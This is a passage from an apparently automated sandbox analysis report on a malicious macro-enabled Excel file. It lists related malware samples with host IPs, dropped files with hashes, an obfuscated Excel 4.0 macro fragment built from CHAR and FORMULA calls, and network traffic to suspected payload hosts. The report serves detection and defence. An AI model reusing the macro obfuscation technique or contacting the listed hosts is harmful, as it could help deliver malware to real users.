                                                                                                                                          • 192.185.115.3
                                                                                                                                          part-1500645108.xlsbGet hashmaliciousBrowse
                                                                                                                                          • 162.241.62.201
                                                                                                                                          shedy.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.241.218.172
                                                                                                                                          product list.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 162.241.218.178
                                                                                                                                          accounts...exeGet hashmaliciousBrowse
                                                                                                                                          • 192.185.164.148
                                                                                                                                          New product of Aluminium Profile.exeGet hashmaliciousBrowse
                                                                                                                                          • 192.185.84.191
                                                                                                                                          BL. AWSMUNDAR3606-21.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.241.148.56
                                                                                                                                          draft_inv dec21.exeGet hashmaliciousBrowse
                                                                                                                                          • 162.241.120.147
                                                                                                                                          bank details.exeGet hashmaliciousBrowse
                                                                                                                                          • 192.185.134.38
                                                                                                                                          NEW INQUIRY ORDER.vbsGet hashmaliciousBrowse
                                                                                                                                          • 192.185.29.73
                                                                                                                                          Details.exeGet hashmaliciousBrowse
                                                                                                                                          • 192.185.164.148
                                                                                                                                          COMMERCIAL INVOICE AND BILL OF LANDING... 11232021.exeGet hashmaliciousBrowse
                                                                                                                                          • 192.185.84.191
                                                                                                                                          counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                          • 108.179.192.98
                                                                                                                                          AS-26496-GO-DADDY-COM-LLCUSSCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          PAYMENT PROOF.exeGet hashmaliciousBrowse
                                                                                                                                          • 160.153.63.160
                                                                                                                                          TT swift copy.exeGet hashmaliciousBrowse
                                                                                                                                          • 148.66.138.249
                                                                                                                                          DHL DOCUMENT FOR #504.exeGet hashmaliciousBrowse
                                                                                                                                          • 72.167.241.180
                                                                                                                                          Purchase order.exeGet hashmaliciousBrowse
                                                                                                                                          • 148.66.138.249
                                                                                                                                          swift copy.exeGet hashmaliciousBrowse
                                                                                                                                          • 160.153.63.160
                                                                                                                                          print_01.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.56.180
                                                                                                                                          New order.exeGet hashmaliciousBrowse
                                                                                                                                          • 148.66.138.249
                                                                                                                                          PO_30-11-2021.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 166.62.110.60
                                                                                                                                          New order.exeGet hashmaliciousBrowse
                                                                                                                                          • 148.66.138.249
                                                                                                                                          ORDEN DE COMPRA (2).exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.88.78
                                                                                                                                          remitted payment.exeGet hashmaliciousBrowse
                                                                                                                                          • 160.153.63.160
                                                                                                                                          ORDEN DE COMPRA (2).exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.88.78
                                                                                                                                          ABONOF2201_exe.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.56.180
                                                                                                                                          request quotation.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.38.104
                                                                                                                                          Linux_amd64Get hashmaliciousBrowse
                                                                                                                                          • 160.153.92.132
                                                                                                                                          cT69PbT3G6.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.51.79
                                                                                                                                          PURCHASED ORDER CONFIRMATION UGANDA.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 148.72.214.23
                                                                                                                                          swift copy.exeGet hashmaliciousBrowse
                                                                                                                                          • 160.153.63.160
                                                                                                                                          New order.exeGet hashmaliciousBrowse
                                                                                                                                          • 148.66.138.249

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          37f463bf4616ecd445d4a1937da06e19Kqn63gUZFq.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          837375615376.dllGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          837375615376.dllGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          lzJWJgZhPc.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          #U0420R#U04223445FM.htmGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          SMK_EFT_BILLPAY.htmlGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          GlobalfoundriesINV33-45776648.htmGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          koCttsCjGY.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          Chrome.Update.23af76.jsGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          DHL Express shipment notification.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          Chrome.Update.23af76.jsGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          Transferencia_29_11_2021 17.03.39.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          part-1500645108.xlsbGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          gXphSPTf52.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          VM845.htmlGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          Rl3M5OSf6P.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          #U0192#U0e25#U00a2_#U0192#U03b1#U0aee#U01ad#U00b5#U0ae8#U03b1_#U05e0jumozeK_Yim73678.vbsGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229
                                                                                                                                          DOC209272621615.PDF.exeGet hashmaliciousBrowse
                                                                                                                                          • 107.180.46.229

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7A7D450E-0610-43BD-BE93-0BD5327AEEE8
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):140193
                                                                                                                                          Entropy (8bit):5.357949437721391
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:NcQIfgxrBdA3gBwtnQ9DQW+z2k4Ff7nXbovidXiE6LWmE9:XuQ9DQW+zYXfH
                                                                                                                                          MD5:D8DEC9CBF6330B55B3306F1D12FAEC39
                                                                                                                                          SHA1:3423392A1DA9FFAD2FB1FD41A5A68196EFDAEECC
                                                                                                                                          SHA-256:1CAE713D69A6E3D907F5B5CB994E9ACBD858CFF49DBFFE3287E84C8000C789F6
                                                                                                                                          SHA-512:C636035796B7B4840C55FBC561D5D852712782BBBAB8368BBA662BE52CFD7DF1EB330A1E3D842E6D04B81B6B8D74F4A615821BDB517D4A116975B8CA399FBEE4
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T09:26:03">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\33AE098B.tmp
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1536
                                                                                                                                          Entropy (8bit):1.1464700112623651
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                          MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                          SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                          SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                          SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                          Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DCF4C732.png
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                          File Type:PNG image data, 1714 x 241, 8-bit colormap, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):14200
                                                                                                                                          Entropy (8bit):7.855440184003825
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:aeN0UV6iAmjeSvWFL3SdwHEpS4Q24kc49+Tb:jmUxjfC30+kS4Qyob
                                                                                                                                          MD5:4FE798EE522800691796BC9446918C90
                                                                                                                                          SHA1:1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3
                                                                                                                                          SHA-256:EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
                                                                                                                                          SHA-512:FF968DA2D921DA198E93E82E2FB15583CFA4696455755A6674BC321CD90AE5502ADDC445A0F8C630D9DC780E77EEC6FFC83F55CD2C16DDE7F465BFD0D89BF1AA
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: .PNG........IHDR..............-......sRGB.........gAMA......a.....PLTE....6...6.....6..a..a..6......a.....a...aa....6....6...66666.6aa..a..6aaa...a....66.....aaaa..aaaa6a....a....66...6.a.....S.b.....6.:...b....f....S.....t:...6t...f..........:6...S:6.:bS......fbS..Sf.t.....:.t..t....bS..tfb..6.f...Sfb.......:.S.....6l...WtRNS........................................................................................c5.....pHYs..........o.d..5.IDATx^.....q....R.A...[.l...'@. .....G..'..;...%..]U]3s....x.s.;.]]..W...............................................................................................................................................~..|....../~...?.{...~fe./...).H....Og1.6g....1T+v..'"h.._(Z;.Zh.bo.....rip..5.>..).h..(F....Z.[.q2B.WZz,...M}@..n$.dO.VK?......YZ...."-o#.K..q..-#5.JT1.K.H..]se.M+.!...R..m{..Q#lO..^ev.R:...0.>.....\....=.>.Op.<..p....qN.Vfq,..\F..6.1..+.. .J....c.4?.Jx...u..X+.E.D...Ko.}...s..G..8I.v...8'B....y..).
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\P0UY3TPH.htm
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):174739
                                                                                                                                          Entropy (8bit):5.2177771329382745
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:Ey/WQHnjZZ++99ffmmWWdmblJwNFmbxikGHSllanRYGUqcVudlxMu:Ey/WQHnjZZ++99ffmmWWdmbldbxs
                                                                                                                                          MD5:8390656A9CE7D214386AE81EA0B89D32
                                                                                                                                          SHA1:B2B0D4E1F626E16601C3F58EC95109A06312AEF7
                                                                                                                                          SHA-256:AC7541E64DD6B4FAF9E12E8DB314AFB68F2E35B8ADBE0EA87C2B5B2D879240A0
                                                                                                                                          SHA-512:95FC9DFAE57FD87B252DF9973955BB4DC3EDEB7048BA2B51C12C519F4BB31F223C0A3603F73B0A5558F352817726F89E8CEFC97C49AC1BC8D00A1122A8D00A3B
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: <!DOCTYPE html>.<html lang="es">.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />..<title>Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing</title>.<meta name="dc.title" content="Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing" />.<meta name="dc.description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor.a y acompa.amiento de profesionales para conseguir m.s clientes. Obt.n tu revisi.n de marketing digital GRATIS ahora!" />.<meta name="dc.relation" content="https://vendes.marketing/" />.<meta name="dc.source" content="https://vendes.marketing/" />.<meta name="dc.language" content="es_ES" />.<meta name="description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor
                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFC9202BBA01CD114F.TMP
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\Desktop\~$SCAN_7295943480515097.xlsm
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):165
                                                                                                                                          Entropy (8bit):1.6081032063576088
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                          MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                          SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                          SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                          SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                          C:\Users\user\besta.ocx
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):174739
                                                                                                                                          Entropy (8bit):5.2177771329382745
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:Ey/WQHnjZZ++99ffmmWWdmblJwNFmbxikGHSllanRYGUqcVudlxMu:Ey/WQHnjZZ++99ffmmWWdmbldbxs
                                                                                                                                          MD5:8390656A9CE7D214386AE81EA0B89D32
                                                                                                                                          SHA1:B2B0D4E1F626E16601C3F58EC95109A06312AEF7
                                                                                                                                          SHA-256:AC7541E64DD6B4FAF9E12E8DB314AFB68F2E35B8ADBE0EA87C2B5B2D879240A0
                                                                                                                                          SHA-512:95FC9DFAE57FD87B252DF9973955BB4DC3EDEB7048BA2B51C12C519F4BB31F223C0A3603F73B0A5558F352817726F89E8CEFC97C49AC1BC8D00A1122A8D00A3B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: <!DOCTYPE html>.<html lang="es">.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />..<title>Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing</title>.<meta name="dc.title" content="Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing" />.<meta name="dc.description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor.a y acompa.amiento de profesionales para conseguir m.s clientes. Obt.n tu revisi.n de marketing digital GRATIS ahora!" />.<meta name="dc.relation" content="https://vendes.marketing/" />.<meta name="dc.source" content="https://vendes.marketing/" />.<meta name="dc.language" content="es_ES" />.<meta name="description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:Microsoft Excel 2007+
                                                                                                                                          Entropy (8bit):7.624498524713085
                                                                                                                                          TrID:
                                                                                                                                          • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                                          • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                                          • ZIP compressed archive (8000/1) 8.08%
                                                                                                                                          File name:SCAN_7295943480515097.xlsm
                                                                                                                                          File size:38040
                                                                                                                                          MD5:1ab11dce30326f39f6186f9aa05d5777
                                                                                                                                          SHA1:397dd88ca9d78a16ab549a8d22a711ddbea80c05
                                                                                                                                          SHA256:8f8e07b2eaca8af62e86cebd2372f1b85d420091801ec472796387a44a98bbcd
                                                                                                                                          SHA512:388f99c4621c31b2a696fa271b71a7ac0424bd1114054ee1cf19d20883a25b31184b07b7bc31eb016876fc4163b4b3ac21298c2c5cb9d1edb9e0560da32f9cd5
                                                                                                                                          SSDEEP:768:a/I83XfjrjevZCwVItvxmUxjfC30+kS4QyoO0VIqwgb:anrIItvxXYk4pTVIqR
                                                                                                                                          File Content Preview:PK..........!.L#li............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:74ecd0e2f696908c

                                                                                                                                          Static OLE Info

                                                                                                                                          General

                                                                                                                                          Document Type:OpenXML
                                                                                                                                          Number of OLE Files:1

                                                                                                                                          OLE File "SCAN_7295943480515097.xlsm"

                                                                                                                                          Indicators

                                                                                                                                          Has Summary Info:
                                                                                                                                          Application Name:
                                                                                                                                          Encrypted Document:
                                                                                                                                          Contains Word Document Stream:
                                                                                                                                          Contains Workbook/Book Stream:
                                                                                                                                          Contains PowerPoint Document Stream:
                                                                                                                                          Contains Visio Document Stream:
                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                          Flash Objects Count:
                                                                                                                                          Contains VBA Macros:

                                                                                                                                          Macro 4.0 Code

                                                                                                                                          4,7,=CHAR('Ss1'!E45)
                                                                                                                                          11,1,o
                                                                                                                                          
                                                                                                                                          1,5,L
                                                                                                                                          11,1,=CHAR('Ss1'!N43)
                                                                                                                                          
                                                                                                                                          2,0,r
                                                                                                                                          10,4,=CHAR('Ss1'!D39)
                                                                                                                                          
                                                                                                                                          1,8,C
                                                                                                                                          12,3,=CHAR('Ss1'!S46)
                                                                                                                                          
                                                                                                                                          1,3,=FORMULA()=FORMULA()=FORMULA('Buk1'!E11,'Buk2'!B12)=FORMULA('Buk2'!H5,'Buk3'!H3)=FORMULA('Buk3'!C9,'Buk4'!C2)=FORMULA('Buk4'!I8,'Buk5'!F2)=FORMULA('Buk5'!B12,'Buk6'!B10)=FORMULA('Buk6'!G3,'Buk7'!I2)=FORMULA('Buk7'!D13,'Buk1'!A3)=FORMULA('Buk3'!H3&'Ss1'!O6&'Ss1'!D16&'Ss1'!K13&'Ss1'!R12&'Ss1'!R14,D3)=FORMULA('Buk3'!H3&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!B9,D17)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!L5&'Ss1'!R14,D19)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA1"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!O9&'Ss1'!R14,D21)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA2"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!M20&'Ss1'!K23&'Ss1'!N24&'Ss1'!P18&'Ss1'!K18&'Ss1'!R12&'Ss1'!I8&'Ss1'!R14&'Ss1'!R7&'Ss1'!R14,D23)=FORMULA('Buk3'!H3&'Ss1'!J7&'Ss1'!N15&'Ss1'!J7&'Ss1'!M20&'Ss1'!R12&'Ss1'!R16&Ss1br2!Q3&Ss1br2!K10&Ss1br2!I1&'Ss1'!R11&'Ss1'!R5&'Ss1'!R5&'Ss1'!R3&'Ss1'!P2&'Ss1'!O1&'Ss1'!O9&'Ss1'!N5&'Ss1'!F3&'Ss1'!R5&'Ss1'!B9&'Ss1'!I12&'Ss1'!K8&'Ss1'!R7&'Ss1'!R16&'Ss1'!R18&"LKLW"&'Ss1'!R14,D25)=FORMULA('Buk3'!H3&'Ss1'!K54&'Ss1'!K56&'Ss1'!J58&'Ss1'!M52&'Ss1'!K54&'Ss1'!M61&'Ss1'!R12&'Ss1'!R14,D32)
                                                                                                                                          
                                                                                                                                          2,7,=
                                                                                                                                          8,2,=CHAR('Ss1'!G40)
                                                                                                                                          
                                                                                                                                          1,2,A
                                                                                                                                          7,8,=CHAR('Ss1'!J39)
                                                                                                                                          
                                                                                                                                          2,6,=CHAR('Ss1'!R41)
                                                                                                                                          9,1,e
                                                                                                                                          

                                                                                                                                          Network Behavior

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 2, 2021 10:26:08.133493900 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:26:11.141048908 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:26:17.157094955 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:26:17.317864895 CET8049740162.240.9.126192.168.2.3
                                                                                                                                          Dec 2, 2021 10:26:17.318061113 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:26:17.800939083 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:26:20.813682079 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:26:23.860819101 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:26:29.861299038 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:26:41.862371922 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:26:48.896142006 CET8049740162.240.9.126192.168.2.3
                                                                                                                                          Dec 2, 2021 10:26:48.896275997 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:26:53.863374949 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:27:05.864382029 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:27:29.866477013 CET4974080192.168.2.3162.240.9.126
                                                                                                                                          Dec 2, 2021 10:27:30.027288914 CET8049740162.240.9.126192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:30.157196999 CET4980680192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:30.268580914 CET8049806107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:30.268765926 CET4980680192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:30.269488096 CET4980680192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:30.379883051 CET8049806107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:31.017816067 CET8049806107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:31.017997980 CET4980680192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:31.025733948 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:31.025783062 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:31.025880098 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:31.027515888 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:31.027540922 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:31.374562979 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:31.374825954 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:31.437557936 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:31.437609911 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:31.438004017 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:31.442553043 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:31.443487883 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:31.484879971 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.553011894 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.553037882 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.553085089 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.553250074 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:32.553282022 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.553369045 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:32.663192034 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.663268089 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.663331985 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.663465023 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:32.663495064 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.663511038 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:32.663554907 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:32.773646116 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.773713112 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.773849010 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:32.773869991 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.773910046 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:32.773932934 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:32.853178978 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.853240013 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.853388071 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:32.853415012 CET44349807107.180.46.229192.168.2.3
                                                                                                                                          Dec 2, 2021 10:27:32.853488922 CET49807443192.168.2.3107.180.46.229
                                                                                                                                          Dec 2, 2021 10:27:32.885051012 CET44349807107.180.46.229192.168.2.3
